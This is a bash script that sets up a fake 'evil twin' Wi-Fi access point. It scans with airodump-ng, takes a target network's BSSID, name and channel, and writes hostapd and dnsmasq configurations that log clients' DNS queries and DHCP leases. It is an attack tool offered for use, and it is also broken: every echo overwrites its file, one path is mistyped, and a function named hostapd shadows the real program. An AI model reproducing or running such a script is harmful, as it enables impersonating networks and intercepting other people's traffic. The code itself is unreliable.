#!/bin/bash
rm -r /log/mac.txt > /dev/null 2>&1
rm -r /log/hostapd.conf > /dev/null 2>&1
rm -r /log/dnsmasq.conf > /dev/null 2>&1

#create hostapd.conf 
function hostapd(){
echo interface=wlan1 > /log/hostapd.conf
echo driver=nl80211 > /log/hostapd. con
echo ssid=$ssid > /log/hostapd.conf
echo channel=$c > /log/hostapd.conf
} 

#create dns
function dns(){
echo interface=wlan1 > /log/dnsmasq.conf
echo dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h > /log/dnsmasq.conf
echo dhcp-option=3,192.168.1.1 > /log/dnsmasq.conf
echo dhcp-option=6,192.168.1.1 > /log/dnsmasq.conf
echo server=8.8.8.8 > /log/dnsmasq.conf
echo log-queries > /log/dnsmasq.conf
echo log-dhcp > /log/dnsmasq.conf
echo listen-address=127.0.0.1 > /log/dnsmasq.conf
} 

#fakeAp
function fakeAp(){
echo "Choose Target "
read -p "BSSID   [*]Example 00:A9:5B:xx:xx:xx: " bsid;
read -p "ESSID   [*]Example EvilFakeAp: " ssid;
read -p "Channel [*]Example 11: " c;
echo
echo "bssid    :$bsid"
echo "essid    :$ssid"
echo "Channel  :$c"
echo $bsid > /log/mac.txt

dns
sleep 2
hostapd
sleep 2

echo "Create Fake App"
sleep 1
hostapd /log/hostapd.conf
}

airodump-ng wlan1
fakeAp
